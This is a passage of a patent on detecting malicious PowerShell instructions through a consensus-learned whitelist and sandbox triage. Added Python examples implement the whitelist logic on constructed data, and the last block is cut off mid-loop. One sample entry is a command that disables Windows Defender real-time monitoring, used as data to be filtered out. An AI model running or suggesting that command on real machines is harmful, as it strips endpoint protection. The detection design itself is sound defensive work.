The generation manner of the security command set is similar to that of the security function set, and is not described herein again.
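The consensus learning of steps S1411 to S1414, and the same procedure applied to executed commands in S142, as an added example (not the patent's own code). It counts, for every element a host executed, how many other hosts also executed it (F2), keeps the elements that reach the threshold N (F3), and unions the per-host sets into the deduplicated W_all. The same function serves function names and command strings. The host codes, cmdlet names and the 60% default are constructed sample values, not real telemetry.

```python
"""Consensus learning of the PowerShell basic behavior white list.

Added example, not the patent's own code. It implements the counting (F2) and
threshold (F3) logic of steps S1411-S1414 and, because S142 states that the
security command set is built the same way, works on either executed function
names or executed command strings. The host names and cmdlet names below are
constructed sample data, not real telemetry.
"""
import math
from collections import Counter
from typing import Dict, Optional, Set, Tuple


def occurrence_statistics(hosts: Dict[str, Set[str]], host: str) -> Dict[str, int]:
    """F2: for every element L_yMx executed by `host`, count the number S_y of
    *other* hosts in the group whose executed set also contains it."""
    others: Counter = Counter()
    for code, executed in hosts.items():
        if code != host:
            others.update(executed)  # executed is a set, so each other host counts once
    return {item: others[item] for item in hosts[host]}


def host_whitelist(hosts: Dict[str, Set[str]], host: str,
                   threshold: int) -> Tuple[Set[str], Set[str]]:
    """F3: elements with S_y >= N go into the host's security set W_Mx;
    the rest are returned separately for exception handling."""
    stats = occurrence_statistics(hosts, host)
    safe = {item for item, s_y in stats.items() if s_y >= threshold}
    return safe, set(stats) - safe


def consensus_whitelist(hosts: Dict[str, Set[str]], ratio: float = 0.6,
                        threshold: Optional[int] = None
                        ) -> Tuple[Set[str], Dict[str, Set[str]]]:
    """S1411-S1414: build W_Mx for every host, then integrate and deduplicate
    into W_all. N defaults to 60% of the host count (N = 6 for ten hosts, as in
    the page's example) unless an explicit threshold is given."""
    n = threshold if threshold is not None else math.ceil(ratio * len(hosts))
    w_all: Set[str] = set()
    rejected: Dict[str, Set[str]] = {}
    for code in hosts:
        safe, bad = host_whitelist(hosts, code, n)
        w_all |= safe  # the set union performs the S1414 deduplication
        if bad:
            rejected[code] = bad
    return w_all, rejected


# Constructed sample group of ten hosts (T1..T10), each reporting the
# cmdlet names it executed during one 24-hour collection interval.
BASELINE = {"Get-Process", "Get-Service", "Get-ChildItem",
            "Test-Path", "Write-Output", "Get-Date"}
SAMPLE_HOSTS: Dict[str, Set[str]] = {f"T{i}": set(BASELINE) for i in range(1, 11)}
for i in range(1, 8):   # 7 hosts run Get-EventLog: each sees 6 others, meets N = 6
    SAMPLE_HOSTS[f"T{i}"].add("Get-EventLog")
for i in range(1, 7):   # 6 hosts run Get-Hotfix: each sees only 5 others, below N
    SAMPLE_HOSTS[f"T{i}"].add("Get-Hotfix")
SAMPLE_HOSTS["T3"].add("Export-Csv")  # run on a single host only

if __name__ == "__main__":
    w_all, rejected = consensus_whitelist(SAMPLE_HOSTS)
    print("W_all:", sorted(w_all))
    for code, bad in sorted(rejected.items()):
        print(f"{code}: not in consensus -> {sorted(bad)}")
```

The boundary cases in the sample data show what the threshold really measures: an element is counted against the other hosts, so a function run on exactly N hosts is rejected on every one of them, while one run on N + 1 hosts passes. A rare but benign element such as the single-host `Export-Csv` is excluded from W_all; that is the expected false-positive cost of a consensus white list, and it is why the method routes unmatched items to the sandbox instead of blocking them outright.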

And S143, performing consensus learning according to all powershell function call chain sets in the host group, and generating all and only powershell security function call chain sets of the host group to obtain a security function call chain set.

In this embodiment, the security function call chain set refers to a set formed by corresponding elements of the powershell function call chain set of each host belonging to the security function set.

In an embodiment, referring to fig. 5, the step S143 may include steps S1431 to S1432.

S1431, screening powershell function call chains matched with the security function set in the powershell function call chain set corresponding to each host in the host group to obtain a security function call chain set of each host.

In this embodiment, the security function call chain set of a host refers to the set formed by those elements of the host's powershell function call chain set that match the security function set.

In particular, there is an algorithm F4, which compares each host's powershell function call chain set acquired from the host group T with the powershell security function set W_all and judges whether unknown abnormal function call chains exist.

Algorithm F4 decides as follows. For the endpoint host group T{T_1, T_2, ……, T_n}, where T_1, T_2, ……, T_n are the host codes, acquire the powershell function call chain set {T_S1, T_S2, ……, T_Sn} of each host and calculate how the powershell function call chains of each host match the security function set W_all. Let the current endpoint host be T_x and its powershell function call chain set be T_Sx; for each powershell function call chain H_ySx in T_Sx, check whether all functions involved in H_ySx match the security function set W_all, i.e. calculate F4{(H_ySx, W_all)};

When H_ySx ⊆ W_all, F4{(H_ySx, W_all)} = 0: the powershell function call chain corresponding to H_ySx is considered safe and is put into the security function call chain set M_Sx of host T_x; when H_ySx ⊄ W_all, F4{(H_ySx, W_all)} = 1: the powershell function call chain corresponding to H_ySx is considered an abnormal call chain and exception handling is performed.

Let the current endpoint host be T_1 with function call chain set T_S1{H_1S1, H_2S1, H_3S1, ……, H_50S1}. For each powershell function call chain H_ySx in T_S1, whether all functions involved in it match the security function set W_all should be calculated, i.e. F4{(H_ySx, W_all)}.

In this example: H_1S1 ⊆ W_all, so F4{(H_ySx, W_all)} = 0: the powershell function call chain corresponding to H_1S1 is considered safe and is put into the security function call chain set M_S1 of host T_1; H_2S1 ⊄ W_all, so F4{(H_ySx, W_all)} = 1: the powershell function call chain corresponding to H_2S1 is considered an abnormal call chain and exception handling is performed. By the same reasoning, all functions involved in each element H_ySx of the function call chain set T_S1{H_1S1, H_2S1, H_3S1, ……, H_50S1} of host T_1 are matched one by one against the powershell security function set W_all. In this example, the powershell function call chains H_2S1, H_6S1, H_8S1, H_33S1, H_38S1 and H_47S1 do not conform to the consensus learning mechanism, and the remaining 44 powershell function call chains are placed in the security function call chain set M_S1 of host T_1.

And S1432, integrating the security function call chain set of each host to form a whole security function call chain set.

In this embodiment, the set of all security function call chains refers to the set of security function call chains of all hosts.

And S1433, carrying out element duplication removal on all the safety function call chain sets to obtain a safety function call chain set.

In the present embodiment, after algorithm F4 the powershell security function call chain set M_Sx corresponding to each host T_x is generated. The set of all powershell security function call chain sets M_S{M_S1, M_S2, M_S3, ……, M_Sn} of the host group T{T_1, T_2, ……, T_n} is collected, the elements of {M_S1, M_S2, M_S3, ……, M_Sn} are deduplicated, and finally the complete and unique powershell security function call chain set M_all of the host group T{T_1, T_2, ……, T_n} is generated.

Specifically, the consensus mechanism judgment is made one by one on the powershell function call chain data in the whole host group, generating the set of all powershell security function call chain sets {M_S1, M_S2, M_S3, ……, M_S10} of the host group T{T_1, T_2, ……, T_10}. The elements of {M_S1, M_S2, M_S3, ……, M_S10} are deduplicated, generating the complete and unique powershell security function call chain set M_all of the host group T{T_1, T_2, ……, T_10}.
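Algorithm F4 and steps S1431 to S1433, as an added example (not the patent's own code). A call chain is represented as a tuple of function names in call order, F4 is the subset test H_ySx ⊆ W_all, and the per-host sets M_Sx are unioned into the deduplicated M_all. The W_all contents and the chains are constructed sample data.

```python
"""Security function call chain set (algorithm F4, steps S1431-S1433).

Added example, not the patent's own code. It assumes a call chain is reported
as a tuple of function names in call order and that the security function set
W_all has already been learned by consensus; W_all and the chains below are
constructed sample data.
"""
from typing import Dict, Iterable, Set, Tuple

CallChain = Tuple[str, ...]


def f4(chain: CallChain, w_all: Set[str]) -> int:
    """F4{(H_ySx, W_all)}: 0 when every function in the chain belongs to W_all
    (H_ySx ⊆ W_all), 1 otherwise."""
    return 0 if set(chain) <= w_all else 1


def unknown_functions(chain: CallChain, w_all: Set[str]) -> Set[str]:
    """The functions that made a chain abnormal, for the alarm detail."""
    return set(chain) - w_all


def host_chain_sets(chains: Iterable[CallChain],
                    w_all: Set[str]) -> Tuple[Set[CallChain], Set[CallChain]]:
    """S1431: split a host's call chain set T_Sx into the security call chain
    set M_Sx and the abnormal chains that need exception handling."""
    chains = set(chains)
    safe = {c for c in chains if f4(c, w_all) == 0}
    return safe, chains - safe


def build_m_all(host_chains: Dict[str, Iterable[CallChain]],
                w_all: Set[str]) -> Tuple[Set[CallChain], Dict[str, Set[CallChain]]]:
    """S1432-S1433: integrate every M_Sx and deduplicate into M_all; also
    return, per host, the chains that failed F4."""
    m_all: Set[CallChain] = set()
    abnormal: Dict[str, Set[CallChain]] = {}
    for code, chains in host_chains.items():
        safe, bad = host_chain_sets(chains, w_all)
        m_all |= safe  # the union deduplicates chains shared by several hosts
        if bad:
            abnormal[code] = bad
    return m_all, abnormal


# Constructed W_all and per-host call chains.
W_ALL = {"Get-Process", "Get-Service", "Where-Object", "Select-Object",
         "Test-Path", "Export-Csv"}
SAMPLE_CHAINS: Dict[str, Iterable[CallChain]] = {
    "T1": [("Get-Process", "Where-Object", "Select-Object"),
           ("Get-Service", "Where-Object"),
           ("Get-Process", "Out-GridView")],   # Out-GridView is not in W_all
    "T2": [("Get-Service", "Where-Object"),    # same chain as on T1
           ("Test-Path",),
           ("Get-Content", "Export-Csv")],     # Get-Content is not in W_all
}

if __name__ == "__main__":
    m_all, abnormal = build_m_all(SAMPLE_CHAINS, W_ALL)
    print("M_all:", sorted(m_all))
    for code, chains in sorted(abnormal.items()):
        for chain in chains:
            print(f"{code}: abnormal chain {chain}, unknown {unknown_functions(chain, W_ALL)}")
```

Note that F4 as defined on the page is a membership test on the functions of a chain, not on their order, so a chain built entirely from whitelisted functions passes even if that exact sequence was never seen before; the later F5 stage, which also checks the executed command against Q_all, is what catches such cases.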

S150, sending the powershell basic behavior white list to a host, when the host detects that a newly added powershell instruction exists, acquiring newly added powershell instruction information by the host, and matching the newly added powershell instruction information with the powershell basic behavior white list to obtain an undetermined instruction set.

In this embodiment, the pending instruction set refers to a set formed by a newly added powershell instruction that the host cannot determine whether the instruction is an exception.

In an embodiment, the step S150 may include the following steps:

sending the powershell basic behavior white list to a host;

when the host computer detects that a new powershell instruction is added, the host computer obtains information of the new powershell instruction;

the host screens out those entries of the newly added powershell instruction information whose powershell function call chain belongs to the security function call chain set and whose powershell command belongs to the powershell commands corresponding to elements of the security command set, to form safe instructions, and the safe instructions are released;

the host screens out those entries of the newly added powershell instruction information whose powershell command does not belong to the powershell commands corresponding to elements of the security command set, to form unsafe instructions; the unsafe instructions are blocked and the relevant information is alarmed;

and the host screens out those entries of the newly added powershell instruction information whose powershell function call chain does not belong to the security function call chain set but whose powershell command does belong to the powershell commands corresponding to elements of the security command set, to form the pending instruction set.

In this embodiment, the server issues the complete and unique powershell security command set Q_all and powershell security function call chain set M_all of the host group T{T_1, T_2, ……, T_n} to each endpoint host, which matches them against the host's acquired powershell function call chains and powershell commands to judge whether there are unknown abnormal instructions.

The agent software installed on the endpoint host monitors whether a newly added powershell instruction exists; if a newly added powershell instruction exists on the endpoint host, the newly added powershell instruction information is acquired, including the endpoint host code T_x, the powershell function call chain set T_rSx and the executed powershell command data set T_rGx.

There is an anomaly comparison algorithm F5, which matches the function call chain set T_rSx and the executed powershell command data set T_rGx corresponding to the newly added powershell instructions against the security command set Q_all and the powershell security function call chain set M_all of the host group T{T_1, T_2, ……, T_n}, and judges whether the newly added instructions are unknown abnormal instructions.

The anomaly comparison algorithm F5 decides as follows. Let the current host be T_x, the newly added powershell function call chain set be T_rSx and the newly added executed powershell command data set be T_rGx. For each function call chain H_yrSx in T_rSx and each command Z_yrGx in T_rGx, check whether they match the security command set Q_all and the powershell security function call chain set M_all, i.e. calculate F5{(Z_yrGx, H_yrSx), (Q_all, M_all)};

When Z_yrGx ∈ Q_all and H_yrSx ∈ M_all, F5{(Z_yrGx, H_yrSx), (Q_all, M_all)} = 0: the powershell instruction corresponding to Z_yrGx and H_yrSx is considered safe and the instruction is released;

when Z_yrGx ∉ Q_all, regardless of whether H_yrSx ∈ M_all or H_yrSx ∉ M_all, F5{(Z_yrGx, H_yrSx), (Q_all, M_all)} = 1: the powershell instruction corresponding to Z_yrGx and H_yrSx is considered unsafe, the instruction is blocked and the related information is alarmed at the same time;

when Z_yrGx ∈ Q_all and H_yrSx ∉ M_all, F5{(Z_yrGx, H_yrSx), (Q_all, M_all)} = 2: the powershell instruction corresponding to Z_yrGx and H_yrSx is considered an abnormal instruction; the instruction is alarmed, placed in the buffer area of endpoint host T_x, and put into the pending instruction set R_Dx.

For example: endpoint host T_1 is detected executing 4 newly added powershell instructions. The agent monitoring software on endpoint host T_1 automatically acquires the newly added powershell instruction information: the newly added powershell function call chain set T_rS1{H_1rS1, H_2rS1, H_3rS1, H_4rS1} and the newly added powershell command data set T_rG1{Z_1rG1, Z_2rG1, Z_3rG1, Z_4rG1}. These are matched against the security command set Q_all and the powershell security function call chain set M_all of the host group T{T_1, T_2, ……, T_10}, calculating F5{(Z_yrGx, H_yrSx), (Q_all, M_all)};

In this example:

Z_1rG1 ∈ Q_all and H_1rS1 ∈ M_all, so F5{(Z_yrGx, H_yrSx), (Q_all, M_all)} = 0: the powershell instruction corresponding to Z_1rG1 and H_1rS1 is considered safe and the instruction is released;

Z_2rG1 ∉ Q_all, so regardless of whether H_2rS1 ∈ M_all or H_2rS1 ∉ M_all, F5{(Z_yrGx, H_yrSx), (Q_all, M_all)} = 1: the powershell instruction corresponding to Z_2rG1 and H_2rS1 is considered unsafe, the instruction is blocked and the related information is alarmed at the same time;

Z_3rG1 ∈ Q_all and H_3rS1 ∉ M_all, so F5{(Z_yrGx, H_yrSx), (Q_all, M_all)} = 2;

Z_4rG1 ∈ Q_all and H_4rS1 ∉ M_all, so F5{(Z_yrGx, H_yrSx), (Q_all, M_all)} = 2; the powershell instructions corresponding to Z_3rG1, H_3rS1 and to Z_4rG1, H_4rS1 are considered abnormal instructions, the instructions are alarmed and placed in the buffer of host T_1, and then the powershell instructions corresponding to Z_3rG1, H_3rS1 and Z_4rG1, H_4rS1 are put into the pending instruction set R_D1{K_1D1, K_2D1}.
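The endpoint-side matching of step S150 and algorithm F5, as an added example (not the patent's own code). Each newly added instruction is a (command, call chain) pair; the command is checked against Q_all first, so an unknown command is blocked whatever its chain, a known command with a known chain is released, and a known command with an unknown chain is held in the buffer and becomes an element of R_Dx. The white list contents and the four new instructions are constructed sample data chosen to reproduce the page's one-released, one-blocked, two-pending outcome.

```python
"""Endpoint-side matching of newly added PowerShell instructions (algorithm F5).

Added example, not the patent's own code. It assumes the agent reports each new
instruction as a (command, call chain) pair and that the server has issued
Q_all and M_all to the host; the sets below are constructed sample data.
"""
from dataclasses import dataclass, field
from enum import IntEnum
from typing import Iterable, List, Set, Tuple

CallChain = Tuple[str, ...]
Instruction = Tuple[str, CallChain]


class Verdict(IntEnum):
    RELEASE = 0  # Z ∈ Q_all and H ∈ M_all
    BLOCK = 1    # Z ∉ Q_all, whatever the call chain
    PENDING = 2  # Z ∈ Q_all but H ∉ M_all: hold in the buffer, send to the sandbox


def f5(command: str, chain: CallChain,
       q_all: Set[str], m_all: Set[CallChain]) -> Verdict:
    """F5{(Z_yrGx, H_yrSx), (Q_all, M_all)} as defined on the page. The command
    check takes precedence, so an unknown command is blocked even when its
    call chain is whitelisted."""
    if command not in q_all:
        return Verdict.BLOCK
    return Verdict.RELEASE if chain in m_all else Verdict.PENDING


@dataclass
class TriageResult:
    host: str
    released: List[Instruction] = field(default_factory=list)
    blocked: List[Instruction] = field(default_factory=list)
    pending: List[Instruction] = field(default_factory=list)  # R_Dx


def triage(host: str, instructions: Iterable[Instruction],
           q_all: Set[str], m_all: Set[CallChain]) -> TriageResult:
    """Step S150 on one endpoint host: release, block, or buffer each new
    instruction; the pending list is the R_Dx the server collects for the sandbox."""
    result = TriageResult(host)
    buckets = {Verdict.RELEASE: result.released,
               Verdict.BLOCK: result.blocked,
               Verdict.PENDING: result.pending}
    for command, chain in instructions:
        buckets[f5(command, chain, q_all, m_all)].append((command, chain))
    return result


# Constructed white list issued by the server to host T1.
Q_ALL: Set[str] = {"Get-Service -Name Spooler",
                   "Get-Process | Where-Object CPU -gt 50",
                   "Test-Path C:\\Temp"}
M_ALL: Set[CallChain] = {("Get-Service",),
                         ("Get-Process", "Where-Object"),
                         ("Test-Path",)}

# Four constructed new instructions on T1, mirroring the page's example.
NEW_INSTRUCTIONS: List[Instruction] = [
    ("Get-Service -Name Spooler", ("Get-Service",)),                # F5 = 0
    ("Get-Hotfix", ("Get-Hotfix",)),                                # F5 = 1
    ("Get-Process | Where-Object CPU -gt 50",
     ("Get-Process", "Where-Object", "Select-Object")),             # F5 = 2
    ("Test-Path C:\\Temp", ("Test-Path", "Get-Item")),              # F5 = 2
]

if __name__ == "__main__":
    r = triage("T1", NEW_INSTRUCTIONS, Q_ALL, M_ALL)
    print(f"{r.host}: released={len(r.released)} blocked={len(r.blocked)} "
          f"pending R_D1={[cmd for cmd, _ in r.pending]}")
```

Because Q_all membership is an exact match on the command string, any variation in arguments falls into the BLOCK branch rather than the PENDING one; that is the fail-closed side of the design, and in practice it means the command set learned in S142 must be collected in the same normalised form that the agent reports at detection time.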

S160, acquiring the pending instruction set;

S170, placing the set of pending instructions in a server sandbox for execution to obtain an execution result.

In this embodiment, the execution result refers to a result of the pending instruction set executed in the server sandbox.

After algorithm F5, the powershell pending instruction set R_Dx is generated. The pending instruction sets {R_D1, R_D2, R_D3, ……, R_Dn} of the whole host group T{T_1, T_2, ……, T_n} are collected; according to the host code x of each powershell instruction K_yDx in the list, the corresponding instruction is fetched in turn from the corresponding endpoint host T_x, placed in the server sandbox for execution, and judged for abnormal behavior.

For the above example: for the powershell pending instruction set R_D1{K_1D1, K_2D1}, the corresponding powershell instructions are fetched in turn from host T_1 according to the host code, placed in the server sandbox for execution, and the execution result is recorded.

S180, blocking abnormal instructions and alarming related information are carried out according to the execution result, non-abnormal instructions are released, and the non-abnormal instructions are executed.

Specifically, when the execution result is that the corresponding instruction is an abnormal instruction, sending a blocking notification of the abnormal instruction to a host of the corresponding instruction according to the execution result, and alarming related information;

and when the execution result is that the corresponding instruction is a non-abnormal instruction, sending a release notice of the non-abnormal instruction to the host of the corresponding instruction according to the execution result, and allowing the corresponding host to execute the non-abnormal instruction.

In the present embodiment, for the pending instruction sets {R_D1, R_D2, R_D3, ……, R_Dn} of the host group T{T_1, T_2, ……, T_n}, the execution result of each powershell instruction K_yDx in the list in the server sandbox is judged manually, and the sandbox judgment result for instruction K_yDx is sent to the corresponding host according to the host code x of K_yDx. If the instruction has malicious behavior, it is blocked in the buffer area of the corresponding host and the related information is alarmed; if the instruction has no malicious behavior, it is released from the buffer area of the corresponding host and the host is allowed to execute it.

For the above example: according to powershell pending instruction K1D1,K2D1The result in the server sandbox is manually judged, and an instruction K is sent1D1,K2D1Is based on KyDxHost code number 1 to corresponding host T1And sending a sandbox judgment result. In this example, instruction K1D1If there is a malicious behavior, the host T corresponding to the malicious behavior is determined1Blocking the instruction in the buffer area and alarming related information; instruction K2D1If no malicious behavior exists, the host T corresponding to the malicious behavior is determined1Release in buffer while allowing host T1The instruction is executed.

According to the powershell malicious instruction detection method above, the powershell calling mode is detected and matched against the powershell calling mode white list; when a powershell script or command is detected executing, it is matched against the powershell basic behavior white list, and successfully matched powershell behaviors are released. For powershell behaviors that are not matched successfully, the executing script or command is placed in the endpoint host buffer area, executed and inspected in the server sandbox, and released from the host buffer area only after the abnormal behavior judgment. Because the powershell basic behavior white list is generated by periodically collecting information on the executed scripts or commands and performing consensus mechanism learning, accurate powershell malicious instruction detection is achieved and variable powershell malicious instructions can be effectively identified.

Fig. 6 is a schematic block diagram of a powershell malicious instruction detection system 300 according to an embodiment of the present invention. As shown in fig. 6, the present invention further provides a powershell malicious instruction detection system 300 corresponding to the above powershell malicious instruction detection method. The powershell malicious instruction detection system 300 comprises a unit for executing the powershell malicious instruction detection method, and the powershell malicious instruction detection method can be configured in a server. Specifically, referring to fig. 6, the powershell malicious instruction detection system 300 includes a first obtaining unit 301, a first matching unit 302, a collecting unit 303, a consensus learning unit 304, a sending unit 305, a second obtaining unit 306, an executing unit 307, and a processing unit 308.

A first obtaining unit 301, configured to obtain a powershell calling mode set; a first matching unit 302, configured to match the powershell calling mode set with a powershell calling mode white list to obtain a legal calling mode set; the acquisition unit 303 is used for acquiring powershell basic information; the consensus learning unit 304 is used for performing powershell data analysis statistics according to the powershell basic information so as to perform consensus mechanism learning, so as to generate a consensus-based powershell basic behavior white list; the sending unit 305 is configured to send the powershell basic behavior white list to a host, and when the host detects that a new powershell instruction is added, the host obtains information of the new powershell instruction, and matches the information of the new powershell instruction with the powershell basic behavior white list to obtain an undetermined instruction aggregate; a second obtaining unit 306, configured to obtain the set of pending instructions; an execution unit 307, configured to place the set of pending instructions in a server sandbox for execution, so as to obtain an execution result; the processing unit 308 is configured to perform blocking and alarm related information on the abnormal instruction according to the execution result, and release the non-abnormal instruction and execute the non-abnormal instruction.

In this embodiment, the first matching unit 302 is configured to filter elements in the powershell calling mode set that are consistent with the whitelist of the powershell calling modes, so as to obtain a legal calling mode set.

In an embodiment, as shown in fig. 7, the consensus learning unit 304 includes a security function set determination subunit 3041, a security command set determination subunit 3042, and a security function call chain set determination subunit 3043.

A security function set determining subunit 3041, configured to perform consensus learning according to all executed powershell function data sets in the host group, and generate a unique powershell security function set of all the host groups, so as to obtain a security function set; a security command set determining subunit 3042, configured to perform consensus learning according to all executed powershell command sets in the host group, and generate a unique powershell security command set of all the host groups to obtain a security command set; the security function call chain set determining subunit 3043 is configured to perform consensus learning according to all powershell function call chain sets in the host group, and generate a unique powershell security function call chain set of the host group, so as to obtain a security function call chain set.

In an embodiment, as shown in fig. 8, the security function set determination subunit 3041 includes a first statistical module 30411, a first screening module 30412, a first integration module 30413, and a first deduplication module 30414.

A first statistical module 30411, configured to compare, for each host in the host group, the powershell function data set executed by that host with the powershell function data sets executed by the other hosts in the host group, and to count the number of times each powershell function in the powershell function data set executed by the current host appears in the powershell function data sets executed by the other hosts, so as to obtain a times statistical set of each host; the first screening module 30412 is configured to screen out powershell functions corresponding to elements exceeding a set frequency threshold in the frequency statistic set of each host, so as to form a powershell security function set of each host; a first integration module 30413, configured to integrate the powershell security function set of each host to form a complete security function set; a first deduplication module 30414, configured to perform element deduplication on the entire security function set to obtain a security function set.

In an embodiment, as shown in fig. 9, the safety function call chain set determining subunit 3043 includes a second screening module 30431, a second integrating module 30432, and a second duplication eliminating module 30433.

A second screening module 30431, configured to screen a powershell function call chain, which is matched with the security function set, in the powershell function call chain set corresponding to each host in the host group, so as to obtain a security function call chain set of each host; a second integration module 30432 for integrating the set of security function call chains of each host to form a set of all security function call chains; a second deduplication module 30433, configured to perform element deduplication on the set of all security function call chains to obtain a set of security function call chains.

In an embodiment, the sending unit 305 is configured to send the powershell basic behavior white list to a host; when the host detects that a new powershell instruction is added, the host obtains information of the new powershell instruction; the host screens out those entries of the newly added powershell instruction information whose powershell function call chain belongs to the security function call chain set and whose powershell command belongs to the powershell commands corresponding to elements of the security command set, to form safe instructions, and the safe instructions are released; the host screens out those entries of the newly added powershell instruction information whose powershell command does not belong to the powershell commands corresponding to elements of the security command set, to form unsafe instructions, and the unsafe instructions are blocked and the relevant information is alarmed; and the host screens out those entries of the newly added powershell instruction information whose powershell function call chain does not belong to the security function call chain set but whose powershell command does belong to the powershell commands corresponding to elements of the security command set, to form the pending instruction set.

It should be noted that, as can be clearly understood by those skilled in the art, for a specific implementation process of the powershell malicious instruction detection system 300 and each unit, reference may be made to the corresponding description in the foregoing method embodiment, and for convenience and brevity of description, no further description is provided herein.

A powershell malicious instruction detection system 300 as described above may be implemented in the form of a computer program that may be run on a computer device as shown in fig. 10.

Referring to fig. 10, fig. 10 is a schematic block diagram of a computer device according to an embodiment of the present application. The computer device 500 may be a server, wherein the server may be an independent server or a server cluster composed of a plurality of servers.

Referring to fig. 10, the computer device 500 includes a processor 502, memory, and a network interface 505 connected by a system bus 501, where the memory may include a non-volatile storage medium 503 and an internal memory 504.

The non-volatile storage medium 503 may store an operating system 5031 and a computer program 5032. The computer programs 5032 include program instructions that, when executed, cause the processor 502 to perform a powershell malicious instruction detection method.

The processor 502 is used to provide computing and control capabilities to support the operation of the overall computer device 500.

The internal memory 504 provides an environment for the execution of the computer program 5032 in the non-volatile storage medium 503, and when the computer program 5032 is executed by the processor 502, the processor 502 may be caused to execute a powershell malicious instruction detection method.

The network interface 505 is used for network communication with other devices. Those skilled in the art will appreciate that the configuration shown in fig. 10 is a block diagram of only a portion of the configuration relevant to the present teachings and is not intended to limit the computing device 500 to which the present teachings may be applied, and that a particular computing device 500 may include more or less components than those shown, or may combine certain components, or have a different arrangement of components.

Wherein the processor 502 is configured to run the computer program 5032 stored in the memory to implement the following steps:

acquiring a powershell calling mode set;

matching the powershell calling mode set with a powershell calling mode white list to obtain a legal calling mode set;

collecting powershell basic information;

performing powershell data analysis statistics according to the powershell basic information to perform consensus mechanism learning, so as to generate a consensus-based powershell basic behavior white list;

sending the powershell basic behavior white list to a host and, when the host detects that a new powershell instruction is added, having the host acquire the new powershell instruction information and match it against the powershell basic behavior white list to obtain a pending instruction set;

acquiring the pending instruction set;

placing the pending instruction set in a server sandbox for execution to obtain an execution result;

and, according to the execution result, blocking abnormal instructions and alarming the related information, and releasing non-abnormal instructions for execution.

The powershell basic information comprises the powershell basic information of each host in the host group, and the powershell basic information of each host comprises a host code, an executed powershell function data set, a powershell function call chain set and an executed powershell command set.

In an embodiment, when the step of matching the powershell calling mode set with the powershell calling mode white list to obtain the legal calling mode set is implemented by the processor 502, the following steps are specifically implemented:

screening out the elements of the powershell calling mode set that are consistent with the powershell calling mode white list, so as to obtain the legal calling mode set.

In an embodiment, when implementing the step of performing powershell data analysis statistics according to the powershell basic information to perform consensus mechanism learning to generate a powershell basic behavior white list based on consensus, the processor 502 specifically implements the following steps:

performing consensus learning on all executed powershell function data sets in the host group to generate the complete, deduplicated powershell security function set of the host group, so as to obtain a security function set; performing consensus learning on all executed powershell command sets in the host group to generate the complete, deduplicated powershell security command set of the host group, so as to obtain a security command set; performing consensus learning on all powershell function call chain sets in the host group to generate the complete, deduplicated powershell security function call chain set of the host group, so as to obtain a security function call chain set;

the powershell basic behavior white list comprises a security function set, a security command set and a security function call chain set.

In an embodiment, when implementing the step of performing consensus learning on all executed powershell function data sets in the host group to generate the complete, deduplicated powershell security function set of the host group and obtain the security function set, the processor 502 specifically implements the following steps:

for each host in the host group, comparing the executed powershell function data set of that host with the executed powershell function data sets of the other hosts in the host group, and counting, for each powershell function in the current host's executed powershell function data set, the number of other hosts' executed powershell function data sets in which it appears, so as to obtain a count set for each host; screening out the powershell functions whose elements in the count set of each host exceed a set frequency threshold, to form the powershell security function set of each host; integrating the powershell security function sets of all hosts to form the overall security function set; and deduplicating the elements of the overall security function set to obtain the security function set.

In an embodiment, when implementing the step of performing consensus learning on all powershell function call chain sets in the host group to generate the complete, deduplicated powershell security function call chain set of the host group and obtain the security function call chain set, the processor 502 specifically implements the following steps:

screening out, from the powershell function call chain set of each host in the host group, the powershell function call chains that match the security function set, so as to obtain the security function call chain set of each host; integrating the security function call chain sets of all hosts to form the overall security function call chain set; and deduplicating the elements of the overall security function call chain set to obtain the security function call chain set.
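The consensus steps above (the per-host counting against the other hosts, the frequency threshold, the union and deduplication, and the filtering of call chains against the security function set) can be written out directly. The following is an added example, not code from the patent or its applicant; the host group data is constructed, and two points the text leaves open are taken as assumptions and marked as such in the code: a call chain "matches" the security function set when every function in the chain is in that set, and the executed command sets are reduced by the same counting rule as the function sets.

```python
"""Consensus learning of the PowerShell basic behaviour whitelist.

Added example: builds a small host group and derives the security function
set, security command set and security function call chain set by the
counting rule in the text. All sample data is constructed for illustration.
"""
from typing import Dict, List, Set, Tuple

CallChain = Tuple[str, ...]

# Constructed "powershell basic information" for four hosts: host code,
# executed functions, function call chains and executed commands.
HOST_GROUP: List[Dict[str, object]] = [
    {
        "host_code": "h1",
        "functions": {"Get-Process", "Get-Service", "Invoke-WebRequest"},
        "call_chains": {("Get-Process",), ("Get-Service", "Get-Process")},
        "commands": {"Get-Process | Where-Object CPU -gt 10",
                     "Get-Service -Name Spooler"},
    },
    {
        "host_code": "h2",
        "functions": {"Get-Process", "Get-Service"},
        "call_chains": {("Get-Service", "Get-Process")},
        "commands": {"Get-Process | Where-Object CPU -gt 10"},
    },
    {
        "host_code": "h3",
        "functions": {"Get-Process", "Get-Service", "Set-MpPreference"},
        "call_chains": {("Get-Process",), ("Set-MpPreference",)},
        "commands": {"Get-Process | Where-Object CPU -gt 10",
                     "Set-MpPreference -DisableRealtimeMonitoring $true"},
    },
    {
        "host_code": "h4",
        "functions": {"Get-Process", "Invoke-WebRequest"},
        "call_chains": {("Invoke-WebRequest", "Get-Process")},
        "commands": {"Get-Service -Name Spooler"},
    },
]


def consensus_set(per_host: Dict[str, Set[str]], threshold: int) -> Set[str]:
    """For each host, count in how many *other* hosts each of its elements
    also appears, keep the elements whose count exceeds `threshold`, then
    take the union over hosts (the union is the integrate-and-deduplicate
    step of the text)."""
    safe: Set[str] = set()
    for host, elements in per_host.items():
        others = [s for h, s in per_host.items() if h != host]
        counts = {e: sum(1 for s in others if e in s) for e in elements}
        safe |= {e for e, n in counts.items() if n > threshold}
    return safe


def safe_call_chains(chains_per_host: Dict[str, Set[CallChain]],
                     safe_functions: Set[str]) -> Set[CallChain]:
    """Keep the call chains that match the security function set.
    Assumption (the text does not define matching): a chain matches when
    every function in it is in the security function set."""
    result: Set[CallChain] = set()
    for chains in chains_per_host.values():
        result |= {c for c in chains if all(f in safe_functions for f in c)}
    return result


def build_whitelist(hosts: List[Dict[str, object]],
                    threshold: int) -> Dict[str, set]:
    """Build the three-part basic behaviour whitelist for a host group."""
    funcs = {h["host_code"]: set(h["functions"]) for h in hosts}
    cmds = {h["host_code"]: set(h["commands"]) for h in hosts}
    chains = {h["host_code"]: set(h["call_chains"]) for h in hosts}
    safe_functions = consensus_set(funcs, threshold)
    # Assumption: the same counting rule is applied to executed commands.
    safe_commands = consensus_set(cmds, threshold)
    return {
        "functions": safe_functions,
        "commands": safe_commands,
        "call_chains": safe_call_chains(chains, safe_functions),
    }


if __name__ == "__main__":
    whitelist = build_whitelist(HOST_GROUP, threshold=1)
    for name, members in whitelist.items():
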